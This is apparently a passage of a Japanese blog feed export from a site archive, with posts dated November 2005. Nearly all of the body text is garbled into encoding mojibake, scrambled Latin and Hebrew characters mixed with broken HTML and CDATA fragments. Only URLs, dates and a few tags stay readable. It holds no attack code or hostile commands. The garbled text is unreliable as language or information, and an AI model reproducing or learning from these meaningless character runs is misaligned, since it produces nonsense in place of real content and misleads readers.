    -¡¡±׳ֻ‏µַ·½ץ¡£ְ¾¶¿µַָ·½ץ₪־¢¿´¡£¹¾¸ֽ»װֶג³ֹֽנ₪־ֳז¿´¿ֽ×₪ָ₪ג₪₪₪¦¡£»§ֻאֵָֽ¡¾ֶ₪­ֶ₪₪ֱ₪־₪ָ₪­ֶ¨₪²ֳ₪ל₪ֲֶבב₪µ₪ל₪כ¡£¾¡³₪½®₪־²ָ₪ֻµן¸ץ¡£»³²¬ֵ´ְֲֿ÷₪¬½ֹ¶מ₪±₪ע₪·₪¿₪ָ₪­´±·³₪־ֳז₪עֶַֻֽ₪¹₪כ°ֶֶג₪ע₪·₪¿¡£¡ִֹµ­¡§´״¸‎־´µָ₪ָ±׳ֻ‏µַ·½ץ₪ֱֿא־‎½ך₪ֻ½ךֲ°₪·₪¿₪ן₪±₪ַ₪₪¯¡¢³₪½®₪ָ´״ֿ¢₪¢₪כ₪ָ₪₪₪¦₪³₪ָ₪ַ₪ָ₪ך₪¢₪²₪₪·₪¿¡£¥¿¥₪¥ָ¥כ₪¬¡ײֻכֹ·³´ֱֿא־‎½ך¡׳₪ְ₪ֳ₪¿₪־₪ַ¡¢₪ֱ₪ח₪ֳ₪ָ¸ם²ע₪ע₪₪ֽ₪­₪«₪ֽ₪₪₪־ףµף₪ְ₪ֳ₪¿₪«¡ֻ

    - -

    ¡¡₪¶₪ֳ₪ָ¡¢₪³₪־₪ט₪¦₪₪°₪¢₪₪₪ַ₪¹¡£₪₪׳₪½®₪ֿ¡¢¼עִֵ₪־ֻ´ײ²ָ₪ֻ¸ְµ₪·₪¿₪³₪ָ₪¬₪¢₪כ₪י₪·₪₪¡£ְֱׁ±₪־²ָ₪ֻֽ¾·ִ₪¢₪ך₪ע»₪ָ₪·¡¢ֹ´ְ«°לה₪ֿ₪₪«₪ֳ₪¿₪ָ₪µ₪ל₪כֻ´ײ²ָ₪ע¡¢¾¡₪ֿ¡¢₪¹₪°₪ל₪¿²ָ·±¡¦²ָ·₪ע»‎₪ִ₪ז₪¨₪ָ₪₪₪ֳ₪ֶ₪₪ב₪¿₪ָ₪₪₪¦¡£
    -¡¡¡״־µַֿ₪¬₪ז₪¯¡₪־₪₪«₪ַ»ַֿ₪µ₪ף₪ֿ₪¿₪׃₪¿₪׃ְ¶²ָֿ¬ֿ÷₪עֵ׀¾ל₪µ₪»₪ֶ₪₪₪₪¹¡£₪¿₪ְ₪·¡¢÷´ֶ£ֽ¿ַ·½ץ₪ֻ₪ִ₪₪₪ֶ₪ֿ½ס₪₪₪ֶ₪₪₪₪«₪ֳ₪¿₪ֿ₪÷₪ַ₪¹¡£ֻ´ײ·´¼±ׂ₪ֻ₪ִ₪₪₪ֶ₪ג₪×₪½₪י₪¯½ס₪₪₪ֶ₪₪₪₪₪¡£₪¶₪ֳ₪ָ¸«₪¿₪ָ₪³₪ם¡״³¹ֶ»₪ע₪ז₪¯¡₪־²£ֹֽ¡¦¿ְ¸ֽװ₪ֻ₪ג¸«₪¢₪¿₪ך₪₪»₪ף₪ַ₪·₪¿¡£ְ¶²ֿ₪ֿ1830ַ¯ְ¸₪₪ל₪ְ₪«₪יֽ¿ַ·½ץ¡¦·´¼±ׂ₪־½½÷ֽ₪₪ַֹ¯²¼₪ֻ₪₪ך₪₪¹¡£²¿₪«₪ִ₪₪¬₪ך₪¬₪¢₪ֳ₪ֶ₪ג₪ױ₪·₪®₪ַ₪ֿ₪₪₪¡£₪½₪¦»׳₪ֳ₪ֶ₪₪₪¿₪י°ֶ₪־ִך¡¢ָ¬ֿ÷₪־ֶµ­¡״ְ¾ֽ·ֱנ¡₪ֻ÷´ֶ£ֽ¿ַ·½ץ₪־½׀₪ֶ₪¯₪כ₪ָ₪³₪ם₪ע¸«₪ִ₪±₪₪·₪¿¡£₪₪¸₪«₪¯¡ײµלֳ־₪־ֽ¿ַ·½ץ₪¢₪ֶ₪ֻ¹¾¸ֽ₪ַ¼ך»ז₪ע½׀₪·₪¿¡׳₪ָ₪¢₪כ¡£¾÷₪ֿ₪ן₪«₪ך₪₪»₪ף¡£₪¬¡¢ּּ¼±₪ָ¸ע־®₪־₪¢₪ֳ₪¿²ִַ½ְ­₪¬₪¢₪ך₪₪¹¡£
    -¡¡ֽ¿ַ·½ץ₪ה·´¼±ׂ₪־»כְֵ₪ַ¾±ֶגָֽ₪ה°¿·₪־₪³₪ָ₪ע÷ְֵֶ¸¡₪·₪¿₪₪₪־₪ַ₪¹₪¬¡¢½׀±©»°»³₪־ְּ¼£°¿·₪ע÷ַֽ¥ְט₪ֻ₪·₪¿₪₪₪ג₪־₪ַ₪¹₪«₪י¡¢₪½₪־÷מ¶ָ₪ֿ₪¹₪°₪ֻ₪ֿ₪ַ₪­₪½₪¦₪ג₪¢₪ך₪₪»₪ף¡£₪ױ₪ל₪כ₪³₪ָ₪ֿ₪ַ₪­₪₪¹₪¬¡¢¿¼₪¯µ­½ׂ₪ַ₪­₪½₪¦₪ֻ₪¢₪ך₪₪»₪ף¡£÷´ֶ£¸­°ל₪µ₪ף¡¢₪ג₪·₪¯₪ֿ₪₪«₪־₪«₪¿₪¬·¡₪ךµ¯₪³₪·₪ֶ₪¯₪ְ₪µ₪כ₪³₪ָ₪ע´ֲװ₪·₪¿₪₪₪ָ»׳₪₪₪₪¹¡£

    - -

    ¡¡₪₪ס¢ְ¶²ָֿ¬ֿ÷¡״ְ¾ֽ·ֱנ¡₪ֿ¡¢ֵצ»‏₪־½מּ±₪־µ­ֿ¿₪ָ₪·₪ֶ₪¿₪₪₪״₪ף»²¹ֽ₪ֻ₪₪ך₪₪¹¡£÷£₪־´¶³׀₪ְ₪«₪י₪ַ₪·₪ח₪¦₪«¡£ל¿ֶ₪ָ₪־ֱ´¹סֶ»ֳזµ­₪ָ₪₪₪¦₪־₪ג₪ב₪÷₪י₪·₪₪¡£¹װ₪¯ְט¡¹₪ֳַֿ₪־¥ֽ¥¿₪ע»ֵֶ‏₪ל₪ֶ₪ֿ₪³₪₪ב₪ֻ½ס₪­₪ָ₪ב₪ֶ₪₪₪כ¡£¼עֲ₪²°₪־₪»₪¬₪ל₪₪־₪ַַ־¾ײ₪־₪ט₪¦₪¥¸¥ךֹֿ₪־¹װµ׃₪ָ₪ג°₪₪ך₪₪¹¡£»³·ֱ₪־¶¢µׂ₪־¿ֶ¬₪־ּ¾ֱ°₪₪ֹ₪ג½ס₪­µ­₪·₪ֶ₪¯₪ל₪ֶ₪₪₪כ¡£ֵצ»‏¡¢»³·ֱ₪ֻֿµ₪¬₪₪₪¿₪־₪«µ¿ּה₪ֻ»׳₪ֳ₪ֶ₪₪₪¿₪־₪ַ₪¹₪¬¡¢₪½₪ל₪ֻ₪ִ₪₪₪ֶ₪ג½ס₪₪₪ֶ₪¢₪ך₪₪¹¡£ֵ·ֶ¸₪«₪יֵל÷¬₪״₪₪₪¯ֵ׃ֳז¡¢₪³₪־₪¢₪¿₪ך₪ֿֿµ₪¬ֲ¿₪₪₪«₪יµ₪₪ע₪ִ₪±₪כ₪ט₪¦₪ֻ₪ֳָם°ױ₪ע₪¦₪±₪ֶ₪₪₪כ¡£
    -¡¡¡ײְ¶²ָֿ¬ֿ÷₪ְָּֽ³״¡׳₪־²ף₪ַ¡¢ָ¬ֿ÷₪־±©¿¥₪־ּז₪ֻ₪ִ₪₪₪ֶ¡ײ¿ּ°ֽכ¡₪·₪ף₪₪₪י₪₪¡ֻ¡׳₪ָ½ס₪­₪₪·₪¿¡£₪·₪«₪·¡¢ֱב₪ָ₪ֱ₪ך₪ְ₪ֳ₪¿₪«₪ג₪·₪ל₪₪»₪ף¡£¹גּמְ¡¡״ְ¶²ָֿ¬ֿ÷₪־ְּ¼£°¿·¡₪־ֹ½»ז₪ֻ₪¢₪כ¥₪¥י¥¹¥ָ₪ע¸«₪¿₪ָ₪³₪םָ¬ֿ÷₪־ּז₪ֿ¡ײ¿ּ°ֽכ¡׳₪ֻ¸«₪¨₪₪·₪¿¡£₪ָ₪³₪ם₪¬¸וֶ¡¢¾®»³¾¾¾¡°לֿ÷¡״ְ¶²ָֿ¬ֿ÷¡¡¿·¿ֽ×±‎ֽט¼ׂ¡¢1974¡ֻ₪הֲחְמ¼‏ְּ¡״ְ¶²ָֿ¬ֿ÷¡₪ע¸«₪כ₪ָֹ½»ז₪ֻ°₪₪כּז₪¬¹ן°ץ₪·₪ֶ₪¢₪ך₪₪¹¡£₪³₪ֱ₪י₪ֿ¡ײֽכ²׀ֻ­¡₪י₪₪₪«₪₪¦¡ֻ¡׳¡£ֻ­₪ָ₪ְֿ¹ֲח¡£ְּ₪ֶָ°₪¬ֱך½ץ₪±₪¢₪ֳ₪ְֶ¹ֲח₪ָ₪₪כ¾₪₪־₪ַֻ­¡£ְ¹ֲח₪ַ₪¢₪ל₪׀µִּ₪¹₪כ¡£ֵ·²¼₪־ֳז₪ַ°לָײ₪־ְ¹ֲח₪ע¶ֻ₪ב₪כ₪³₪ָ₪¬₪ַ₪­₪כ₪־₪ֿ²¦¼װ¡£₪·₪«₪·ְ¹¶ֻ₪ֻ»ך₪ל₪׀ֵצֱ³¼¡₪ֿ¿ך₪¨₪כ₪ט₪¦₪ֻ₪₪כ₪¬¡¢₪₪₪¿₪÷₪י₪ֻֽ«₪¨₪ֶ₪ג±׳₪ֿ₪₪₪¡£₪ט₪¯¾ן₪ע¼י₪ֳ₪ְֶ¹₪ף₪ֻ²ב₪®₪כ₪³₪ָ₪₪­₪ט₪¦₪ֵֻ״₪ב₪ל₪׀ֽ«₪₪₪ֿ₪₪₪¡¢₪־°ױ¡¡״ֱ‎הַָ±¿ְ×ֲח»צֵµ¡₪ט₪ך¡ֻ¡£¿ּ°ֽכ¡¦ֽכ²׀ֻ­¡¢₪₪₪ֵ₪ל₪¬ְµ₪·₪₪₪«¡£₪₪¿µ­ַ°´₪״¹װ₪¯µ¡²ס₪¬₪¢₪ל₪׀³־ַ§₪·₪¿₪₪₪ָ»׳₪₪₪₪¹¡£

    - -

    ¡¡¡‏»²¹ֽ»ס־ֱ
    -¡¡¡״¿·װ¡¡¾±ֶג¿ּֽ¾¼­ֵµ¡1986.11.
    -¡¡¡״»³·ֱ¸©₪־־ע»ֻ»¶ג¡1993.2.
    -¡¡¡״₪ג₪־₪¬₪¿₪ך¾±ֶג₪ָ¿ֽסֲחְפ»¶»־1988.3.
    -¡¡¡״»³·ֱ»װ»ֻ¡
    -¡¡¡״ְ¾ֽ·ֱנ¡ְ¶²ָֿ¬ֿ÷
    -¡¡
    -¡¡
    -¡¡
    -¡¡2005.11.2
    -¡¡₪·₪ְ₪ׂ₪ם₪·¡¿PoorBook G3'99
    -¡¡ֵ¾÷¡¦°תֽׁ¡¦¥ך¥ף¥¯₪ֿ¼«ֽ³₪ַ₪¹¡£

    ]]> -
    -etc -PoorBook G3'99 -2005-11-02T22:34:56+09:00 -
    - -¿וµם₪ְ₪ט₪ך11·מ£±ֶ -http://www.siesta.co.jp/aozora/archives/002381.html - -ֵ₪־ֲ­²»₪¬₪¿₪·₪«₪ֻ¹₪³₪¨₪כ÷£ֶ¡¢¿וµם¥ל¡¼¥¥כ£¸ֻחּ₪־£ֳ£ִ¡¢ֶֻ¸ל₪ַ²־₪¦¡ײֵ₪־־¹¡׳₪עָ¯ַה₪·₪₪·₪¿¡£¥¸¥ד¥±¥ֳ¥ָ₪¼₪ף₪¿₪₪₪־¥ַ¥¶¥₪¥ף₪¬ֳֶֶָ₪ַ₪¹¡£¿וµם₪־£ֳ£ִ₪ֿ₪₪₪ִ₪ג»ז₪־¥¸¥ד¥±¥ֳ¥ָ₪ֻ₪·₪ֶ₪₪₪₪¹₪¬¡¢₪³₪ל₪₪ַ₪־₪ט₪¦₪ֻ¥¡¼¥כ»ז₪ֻּ₪־»ז₪עֵ½₪ֳ₪¿¥¿¥₪¥׳₪ַ₪ֿ₪₪¯¡¢¸»ז₪ִֻ¾ְ°ץ÷‏₪·₪ֶ¡¢ְ₪ך₪¿₪¿₪¸ֹׂױ₪±₪·₪ֶ₪¢₪ך₪₪¹¡£ֶף₪ִ₪¢₪כֶ‏¸‎₪־ׂ‎₪ֻ£ֳ£ִ¡¢₪ג₪¦ׂ‎₪ֻ²־»ל¥«¡¼¥ֹ₪¬ֶ‏₪ֳ₪ֶ₪₪₪₪¹¡£÷מ₪ֳ₪ֶ₪¯₪ל₪¿₪־₪ֿ°°ְמ₪ֻ₪¢₪כ°ץ÷‏½ך₪ַ₪¹¡£¿ְֶ₪ַ₪­₪ֱ₪ף₪ָ₪·₪ֶ₪₪₪ֶ°ֲ₪¯₪ֲֶ®₪₪¡×¡¡ֳֵֵֿ₪ָ¥ב¡¼¥כ₪ַֿ¢ֽם₪ָ¥ַ¡¼¥¿₪ע₪ה₪ך₪ָ₪ך₪·¡¢ֽגִ«ֳַ£₪־ֲנµ״₪¬₪¢₪כ₪×₪«₪²₪ַ¡¢µק־¥₪ע´¶₪¸₪כ₪³₪ָ₪ֿ₪¢₪₪ך₪₪₪₪־₪ַ₪¹¡£
    -

    ]]> -11·מ19ֶ₪ֿ¥·¥ו¡¼¥¥כ¥ָ₪¬ֻ´₪¯₪₪ֳ₪¿ֶ₪ַ₪¹¡£¡ײֵ₪־־¹¡׳ֵלµ‏¸ר±י₪ֿ₪³₪־ּ¿ֶ₪ע₪ֿ₪µ₪ף₪ְ»°ֶ´ײ¡£½׀±י¼װ₪ָ²ס¾ל₪־ֵװ¹ח₪ע₪¢₪ן₪»₪ֶ·ט₪ב₪¿ִֶר₪¬¶צֱ³₪³₪¦₪₪ֳ₪ֶ₪₪₪¿₪־₪ַ₪·₪¿¡£₪ֿ₪¿₪·₪ֶ¶צֱ³₪₪־₪ְ₪ם₪¦₪«¡¢₪ָ»׳₪ֳ₪ֶ₪₪כ₪־₪ג¶½ּ£¿¼₪₪₪ג₪־₪ַ₪¹¡£¥³¥ף¥µ¡¼¥ָ₪־₪¿₪ב₪־¿·÷מ₪־»ם₪ע₪´¾ׂ²נ₪·₪₪¹¡£₪×₪½₪י₪¯»א₪ע°ױ¼±₪·₪ֶ₪₪₪¿₪³₪ם₪־¥·¥ו¡¼¥¥כ¥ָ₪־»ם₪ַ₪¹¡£₪ֹ₪ף₪²־₪₪־₪«¡¢₪½₪ל₪ֵֿצֶ₪־₪׳₪·₪¡£

    - -

    ¡¡¡¡¡¡ּ±½°₪ֱֻ₪¨₪כ
    -¡¡¡¡¡¡¡¡¡¡¥ױ¥י¥ף¥ִ¡¦¥¡¼¥¿¡¼¡¦¥·¥ו¡¼¥¥כ¥ָ¡÷מ¶¡¦ּץ»ל¡§¹ג¶¶ֽ×¼£¡ֻ

    - -

    ¡¡¡¡»‏ֲו₪־ְִ½ױ₪ֿ½×₪ן₪ֳ₪¿
    -¡¡¡¡ּ±½°₪־־ֿ₪ג
    -¡¡¡¡־®₪ל¹װ₪¯·²½°₪־₪₪«₪ֻֻה₪ג₪ל₪ֶ
    -¡¡¡¡»ָ₪₪₪ֿ₪¿₪µ₪ל₪¿

    - -

    ¡¡¡¡¶ל₪·₪₪ֻ₪µ₪₪₪₪₪ל
    -¡¡¡¡₪¢₪־־ֿ₪־ּ¾»ִ₪ך₪µ₪¨
    -¡¡¡¡»‏ֲו₪ֻ₪µ₪₪¿₪²₪י₪ל₪ֶ
    -¡¡¡¡¼ֲ₪ך₪₪¯¾ֳ₪¨₪כ

    - -

    ¡¡¡¡ּ±½°₪ֿ²־₪עֻ÷₪ל₪ֶ
    -¡¡¡¡ֲֹ₪ף₪ְ»‏ֲו₪ע₪µ₪₪ט₪¦
    -¡¡¡¡₪¢₪־ֶ₪־ּ´₪ע¼־₪ֶ₪ֶ
    -¡¡¡¡¸₪₪כ₪³₪ָ₪ג₪₪¯

    - -

    ¡¡¡¡₪¿₪ְ²־₪ְ₪±₪¬±¿ּ¿₪ֻ
    -¡¡¡¡־©₪ֱ¸‏₪«₪¦־ֿ₪ע₪¯₪ל₪כ
    -¡¡¡¡₪«₪¬₪ה₪¯»׳₪₪½׀₪ע₪¨₪¬₪­
    -¡¡¡¡¶ל₪·₪₪עֲֿ₪י₪²₪ֶ

    - -

    ¡ײ¿וµם₪־₪ט₪¦₪ֻ¡׳₪ע2005ַ¯11·מ¹ז₪ֻ¹¹¿·₪·₪₪·₪¿¡£
    -»¨»ן₪־ּ¼¡₪־₪ט₪¦₪ֻ¡¢¸¶¹ֶ₪־½חָײ₪ע₪­₪ב₪כ₪־₪ֿ¹¹¿·₪־₪¿₪ב₪־÷ַ¸ו₪־³₪·₪₪ַ₪¹¡£÷£·מ₪ֿ¥¿¥₪₪«₪י₪ֿ₪¸₪₪ֳ₪ֶ¥₪¥ף¥ֹ¥ֽ¥·¥¢¡¢¥₪¥י¥¯¡¢¥₪¥¿¥ך¥¢¡¢¥ֹ¥₪¥ִ₪ָ₪ב₪°₪ך¡¢₪ֹ₪³₪ָ₪ג₪ן₪«₪י₪₪₪₪ױ₪·₪®₪־¹ס₪ֲֻ­₪ע₪ױ₪₪₪₪ל¡¢ֶֻ₪״₪ָ₪₪₪¦₪ױ₪¦₪ֻ₪·₪ֶ₪₪₪·₪¿¡£¥ֶ¡¼¥₪ע₪ג₪¦₪±₪כ₪³₪ָ₪ֿ₪·₪₪₪₪־₪ַ¡¢¡ײ¿וµם₪־₪ט₪¦₪ֻ¡׳₪ֵּֿ×₪־₪₪₪־¹₪־₪ט₪¦₪₪ג₪־₪ַ₪¹¡£

    - -

    ¿·₪·₪¯½׀₪¿ֶ£ֲֻֿ»ׂ₪µ₪ף₪־ֻּץ₪ע£²÷‎¡£
    -¡״ֹװ±¿₪½ק¡₪ֿ1982ַ¯₪ֻ¥װ¥¹¥ָ¥כ¼«»¦₪ע₪·₪¿¥ך¥ֱ¥ד¡¼¥ֹ¡¦¥ײ¥ם¡¼¥ֶ¥£¥¬¥ף₪־°הֹ₪־ֳז₪«₪י₪ׂ₪ָ₪ךּ¼₪¬ָ¯¸«₪·₪¿÷ַ¸ו₪־¾®ְג₪ַ₪¹¡£ֶ£ֻ₪µ₪ף₪¬½ס₪₪₪¿¡״¥ך¥ֱ¥ד¡¼¥ֹ¡¦¥ײ¥ם¡¼¥ֶ¥£¥¬¥ף¡₪ע₪¢₪ן₪»₪ֶֶֹ₪א₪ָ₪ט₪ך₪×₪ג₪·₪ם₪₪₪ָ»׳₪₪₪₪¹¡£
    -¡״°ַ₪־ּכ₪ֻ¡₪ֿ¥ײ¥כ¡¼¥־¡¦¥א¥¡¼¥ך₪־³¨ֻ¡£¥₪¥¿¥ך¥¢¸לַָ₪ָ₪×₪₪¸₪¯¥₪¥¿¥ך¥¢₪ַ°ץ÷‏₪µ₪ל₪ֶ₪₪₪₪¹¡£¹ץ₪הָ¾ֶ©ְּ₪־»ז₪¬¸ת²ֵּ×₪ֻ»ָ₪ן₪ל₪ֶ₪₪₪ֶ¡¢¥¡¼¥¸₪ע₪ב₪¯₪כ₪־₪¬³₪·₪₪¡£´ֱַ₪ֶֻ¸ל₪ֻ₪ג₪ִ₪₪¸«ֶ‏₪ֳ₪ֶ₪·₪₪₪₪₪¹¡£

    - -

    11·מ30ֶ₪ֻ₪ֿ¶גֲפ₪ַ¡ײֵ₪־־¹¡׳₪־¸ר±י₪¬₪¢₪ך₪₪¹¡£ֽגֶ12·מ£±ֶ₪ֻµ¢₪ֳ₪ֶ₪«₪י÷מ¶ָ₪ע₪·₪₪¹₪«₪י¡¢¹¹¿·₪ֿ₪₪₪ִ₪ג₪ט₪ך₪×₪½₪¯¡¢£±ֶּכ₪ֻ₪₪כ₪ָ»׳₪₪₪₪¹¡£₪½₪·₪ֶ£³ֶ₪«₪י₪ֻּֿ³₪ֶ»¥ִ¥¢¡¼₪ַ₪¹¡£₪ֹ₪³₪ַ₪ג₪×₪₪₪·₪₪₪ג₪־₪¬ֲװ₪ֳ₪ֶ₪₪₪ֶ₪¯₪ל₪½₪¦¡£°ֵ₪₪ֵ₪־ֻּ₪ֻ־¹₪¹₪כ¼װ₪־ֳֶ¸¢₪ַ₪¹¡£
    -

    ]]> -
    -web -ָ¬´¬ָ‏·ֳ -2005-11-01T11:07:47+09:00 -
    - -¥¹¥¯¥ך¡¼¥ף₪־ֳז₪־ּ¸₪־¾נ· -http://www.siesta.co.jp/aozora/archives/002375.html - -¡¡₪½₪¦₪₪₪¨₪׀°ֲֹ§־ֲֹֿ₪־÷מֹ₪ֻ₪גְד₪¬ֱֹ₪«₪ל₪ֶ₪₪₪₪·₪¿¡£¡״²¦ֶ»₪־¶י¡¡״ֶת¿§₪־¥ָ¥ם¥ִ¥­¡¼¡¡£
    -¡¡ּ¸₪ָ₪₪כ₪ָ₪₪«₪₪«»׳₪₪½׀₪»₪₪»₪ף¡£₪½₪ג₪½₪ג¾¯₪₪₪₪־₪ַ₪·₪ח₪¦₪«¡£₪ֱ₪₪₪ֻ±«₪־₪ֻ₪×₪₪₪ֿ₪ֱ₪ח₪ֳ₪ָ₪ן₪«₪ך₪₪»₪ף¡£¡״¥ײ¥ל¡¼¥ֹ¡¦¥י¥ף¥¡¼¡₪ֱֿ´װִּ₪·₪ֶ±«¡£¥¹¥³¥ֳ¥ָ¥י¥ף¥ֹ₪¬ֹסֲז₪־¡״¥ײ¥ל¥₪¥ײ¡¦¥ֿ¡¼¥ָ¡¡¢¥ך¥ו¥ֳ¥¯¡¦¥¥ֳ¥½¥ף¡״¥¸¥ד¥ף¥ּ¡¦¥ְ¥כ¥¯¡¡£¹ב¹ֱ±ַ²ט₪־ֳ־׃₪ה¾ו³₪₪ֻ₪גּ¸₪¬»ק¹ח¡₪ֻ₪¢¡ֻ₪¦¡£ְ¾ֹפ·א₪ַ₪ֿ»׳₪₪½׀₪»₪₪₪₪±₪ל₪ֹ₪ג¥ֻ¥ו¡¼¥ט¡¼¥¯₪־ֻאֵ·ֿ°₪גֱךְ­₪¬₪₪₪₪¡£¡״¥¥ֳ¥ֹ¡¦¥¥ֳ¥¯¥¹¡₪גֵֶ·₪־ְ₪³¦¡£¡״¥י¥ף¥¡¼¡₪ֻ₪ג₪¢₪ֳ₪¿₪ט₪¦₪µ₪₪¬₪¹₪כ¡£¥ֹ¥₪¥ִ₪־¹ץ₪₪¿¹¡¥·¥ו¥׀¥כ¥ִ¥׀¥כ¥ָ¡ֻ₪ה¥×¡¼¥¹¥ָ¥ך¥¢₪ֻ₪ג»ק¹ח¡₪ֻ₪¢¡ֻ₪¦₪ְ₪ם₪¦¡£¡״¼·¿ֽ₪־»ר¡₪ֿ¥ֹ¥·¥ד¹₪ך₪ְ₪ֳ₪¿₪±₪ל₪ֹּ¸₪ֿ₪₪«₪ֳ₪¿µ₪₪¬₪¹₪כ¡£
    -

    ]]> -

    ¡צ¡צ¡צ


    -¡¡
    -¡¡ּ¸₪־ֵװ¥ם¥ף¥ֹ¥ף¡£¥¡¼¥א¥÷₪ג₪־₪ֻ₪גֹ¬₪÷ּ¸₪¬ֵ׀¾ל₪¹₪כ¡£ּ¸₪־₪₪«₪־ְ׀₪ְ₪¿₪₪עַֿ¼ײ₪¬₪«₪±₪ֶ₪ז₪¯¡£»ׁ₪־₪₪¨₪₪₪₪¦₪ֱ₪ֻ₪ׂ₪ֵ₪ב₪־²»₪¬¹₪³₪¨₪ֶ₪¯₪כ¡£¥¹¥ֶ¥ֳ¥­₪־²»¡£·₪²»¡£¥׃¥ֳ¥°¥¥ף₪־¾ג₪־²»¡£ֿ×ֵ·¾¦₪־ְ¼¡£19ְ₪µ×ֻצ¡£₪¿₪ְ₪·¥ם¥ף¥ֹ¥ף₪־ּ¸₪ֿ fog ₪ַ₪ֿ₪₪¯₪ֶ smog ₪ְ₪ֳ₪¿₪ם₪¦₪ָ₪₪₪¦ְג₪¬₪¢₪כ¡£₪×₪½₪י₪¯₪½₪ל₪¬ְµ₪·₪₪¡£ֵצ»‏¡¢ֳּ÷₪הְ׀ֳ÷₪עַ³־ֱ₪ָ₪·₪¿¾רµ₪µ¡´״₪¬ַתָ¯ֵ×₪ֹֻבµ₪¹₪כ¡£ַ®₪µ₪ל₪¿¾רµ₪¡¥¹¥ֱ¡¼¥א¡ֻ₪ֻ₪₪¸₪ֳ₪ֶ¡¢₪¹₪¹₪±₪¿±ל₪¬³¹ֳז₪ֻ₪¿₪ֱ₪³₪ב₪ֶ₪₪₪¿¡£ַב±ל¡£±לּ¸¡£¡ִ¡ִ₪¡ֱ₪ף₪ֳֶ־₪ֳ₪¿₪ט₪¦₪₪³₪ָ₪ע¸ְ₪ֳ₪¿₪ך₪₪ף₪«₪·₪ֱ₪ד₪ֳ₪¿₪ך₪·₪ֶ¡£
    -¡¡
    -¡¡¥¡¼¥א¥÷₪־½ֵֹ¨¡¢¥¢¥כ¥»¡¼¥ּ¡¦¥כ¥ׁ¥ף₪ֻ₪גּ¸₪¬»ק¹ח¡₪ֻ₪¢¡ֻ₪¦¡£¡״´ס´ה¾כ¡₪ָ₪₪₪¦÷מֹ₪¬₪¢₪ך₪₪¹¡£₪ָ₪¢₪כ³₪±ט₪₪₪־ִֵׂ¼ֻ¡£ְטֳ¼₪־₪ָ₪¬₪ֳ₪¿µנ´ה₪¬³₪ּּ₪«₪י¹ג₪¯ֶֽ₪­½׀₪ֶ₪₪₪כ¡£₪ִ₪ֽ₪ֻ³₪ּ¸₪ע₪₪ָ₪ֳ₪ֶ¡£¥כ¥ׁ¥ף₪ג₪־₪ֻ₪ִֻֿ²ק₪÷מֹ₪¬ֲ¿₪₪₪₪«₪ַ¡¢₪³₪־¡״´ס´ה¾כ¡₪ָֿב°¥´¶₪¬₪¿₪ְ₪ט₪ֳ₪ֶ₪₪₪₪·₪¿¡£₪ג₪ֳ₪ָ₪ג¹¥₪­₪÷מֹ₪«₪ג₪·₪ל₪₪»₪ף¡£ֶמֽ־°לֿ÷ּץ¡£ֱ³¨₪ֿ¡ִ¡ִ¡£
    -¡¡
    -

    ¡צ¡צ¡צ

    - -

    ¡¡ַָ¾ט₪ך₪ע₪·₪ֶ₪₪₪ֶ¡¢₪·₪ְ₪₪₪ֻּ¸₪ֻ₪×₪×₪ן₪ל₪¿₪³₪ָ₪¬²¿ֵ₪«₪¢₪ך₪₪¹¡£₪₪÷¡¢¿ו¿ְ‏₪¬ֹװְּ־ֶ₪ֻ₪₪ך₪₪¹¡£¶ב₪ֵ₪₪₪ֶ₪¯₪כַָ₪ג¸«₪¨₪ֻ₪¯₪¯₪₪כ¡£₪½₪ל₪«₪י¼‏°ֿ₪¬¸«₪¨₪₪¯₪₪כ¡£²­₪־₪₪¦₪ְ₪±₪ַ₪₪¯¡¢₪ױ₪ך₪«₪¨₪ֳ₪ֶ₪גֹֽ₪¬₪«₪¹₪א¡£₪¿₪₪₪ֶ₪₪₪³₪¦₪₪₪¦ֵ·¸ץ₪־₪׀₪¢₪₪¡¢₪µ₪₪ַָֹ¼ֱ₪ֿ₪ן₪כ₪¯₪¢₪ך₪₪»₪ף¡£₪ָ₪ך₪¿₪ֶ₪ֶ־ֹ¼ֱ₪־ֲח₪­₪ַָ₪ָ₪₪₪¦₪ן₪±₪ַ₪ֿ₪₪₪₪±₪ל₪ֹ¡¢ּµֹק₪₪־₪ַ³₪ּּ₪¬₪µ₪¶₪₪־©₪ֳ₪ֶ₪₪₪₪₪¡£»כ³¦₪¬₪¦₪׀₪ן₪ל₪כ₪ָ¡¢ִ°³׀₪ה¿¨³׀₪¬₪ֿ₪¿₪י₪­₪₪¹¡£ְֵ¼ה¡£¿´₪₪½₪¯₪₪כ₪¯₪י₪₪¡£₪¦₪·₪ם₪־₪₪¦₪ַַָ₪¬¥ײ¥ל¥₪¥¯₪¹₪כ²»₪ְ₪±₪¬¹₪³₪¨₪כ¡£₪½₪ל₪«₪י¡¢ֲ־₪¬₪ז₪ֳ₪¯₪ך₪ָ¾ו²¼₪ֻ₪ג₪ֱ₪¢₪²₪י₪ל₪¿₪ך₪¹₪¦₪ֳ₪ָֽמ₪ָ₪µ₪ל₪כ¡£³₪¿ו₪¬¡¢₪₪ף₪ְ₪«¿ו₪ָ₪₪₪¦µ₪₪¬₪·₪₪¯₪₪כ¡£¾®¹ג₪₪»³₪־₪ט₪¦₪×ֲ־¡£₪½₪ל₪¬ּ¸₪־₪₪«₪ע¶ב₪ֵ₪₪₪ֶ₪ֲֿ­₪־²¼₪עִּ₪ך₪¹₪®₪ֶ₪₪₪¯¡£
    -¡¡
    -¡¡µ÷ך₪µ₪ף₪־÷מֹ₪ֻ₪ֿ±ְ₪ֻ₪ִ₪ֳ₪³₪א¾לּּ₪¬₪¯₪ך₪«₪¨₪·ֵ׀¾ל₪·₪₪¹¡£¡״₪ג₪־₪־₪±ֹ±¡₪ַ₪ג»³ּ¸₪ֻ₪ִ₪ִ₪₪ל₪כ¥·¡¼¥ף₪¬₪¢₪כ¡£ּ¸±«¡£±ְ±ֶ¡£₪½₪ל₪¬ֹק₪ֻ₪־₪ֳ₪ֶ²¼¼ך₪״־®₪ל₪¹₪®₪כ₪ָ¡¢°לֵ¾₪·₪ֶֽ÷¹₪·₪¬₪ג₪ֹ₪ֳ₪ֶ₪¯₪כ¡£±ֱַ¥¯¥ך¥¨¡¼¥¿¡¼₪ָ₪·₪ֶ₪ֱֹֿ₪­₪¿₪¯₪₪כ₪־₪¬₪ט₪¯₪ן₪«₪כ¡£₪¿₪ְ₪·¡¢₪½₪־ִ©ְן₪ֿµ₪₪ע₪ִ₪±₪₪₪₪ְָ½÷מֲ¦₪־¼«¸ֻ‏₪ֻ₪×₪ֱ₪₪₪כ¡£¥ך¥¢¥כ₪ֻ¥¥ֱ¥ו¥י¥כ₪עµב₪ב₪כ₪־₪ַ₪¢₪ל₪׀¡¢¼ֲ¼ּ₪ע»£±ֶ₪